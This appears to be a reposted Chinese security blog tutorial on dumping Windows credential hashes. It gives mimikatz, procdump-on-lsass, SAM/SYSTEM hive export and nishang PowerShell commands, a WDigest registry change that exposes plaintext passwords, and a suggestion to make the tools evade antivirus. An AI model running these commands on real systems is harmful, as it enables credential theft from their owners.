windows获取hash常见手法

admin 2024年1月5日08:43:04评论22 views字数 1424阅读4分44秒阅读模式

有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!


一 猕猴桃mimikatz

实验环境 win7

适用于Windows 8.1 和 Windows Server 2012 R2 之前

privilege::debug

sekurlsa::logonpasswords

windows获取hash常见手法


实验环境 win10

Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储

可以读到hash

windows获取hash常见手法


所有我们要修改注册表

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

将 UseLogonCredential 设置为 1 然后重启

Shutdown -r -t 0

再用猕猴桃就可以获取到密码了

privilege::debug
sekurlsa::logonpasswords

windows获取hash常见手法



或者 管理员打开cmd运行procdump导出dmp

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

多说一句,lsass.exe这个Windows系统进程,它负责处理与安全策略和登录身份验证相关的任务,功能有用户登录认证,创建访问令牌。下面这条命令的执行结果是创建一个lsass.exe 进程的完整内存转储文件(12.dmp)。

procdump64.exe -accepteula -ma lsass.exe 12.dmp

然后放到猕猴桃的目录

sekurlsa::minidump 12.dmp
sekurlsa::logonpasswords full

windows获取hash常见手法



二 注册表获取sam文件

从注册表导出

reg save hklmsam e:sam.hivereg save hklmsystem e:system.hive

其中hklm 代表 "HKEY_LOCAL_MACHINE",这是注册表的一个主分支。SAM 是其下的一个子分支,存储了与系统安全账户管理相关的信息,如用户账户和密码哈希。

把这两个hive放到猕猴桃目录

lsadump::sam /sam:sam.hive /system:system.hive

windows获取hash常见手法


实战中,猕猴桃会被杀或者是不允许上传mimikatz,可以把这两个文件拖到自己的机器上读取,如下图我拖本机的密码到虚拟机里一样可以读取。

windows获取hash常见手法


希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以私信加本人微信,与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。


三 powershell


用原版肯定被杀,有能力的可以做一下免杀

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1powershell -exec bypass "import-module .Get-PassHashes.ps1;Get-PassHashes"

windows获取hash常见手法


有师傅说,开赞赏可以增加浏览量,故麋鹿开了该功能,如果您喜欢我们的文章,想让更多的人看到我们的公众号,或者给我们一点小小的鼓励,请您点个赞和再看就行了,如果手头宽裕,打赏一分钱就好啦,谢谢您的喜欢!

原文始发于微信公众号(麋鹿安全):windows获取hash常见手法

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月5日08:43:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows获取hash常见手法https://cn-sec.com/archives/2365398.html

发表评论

匿名网友 填写信息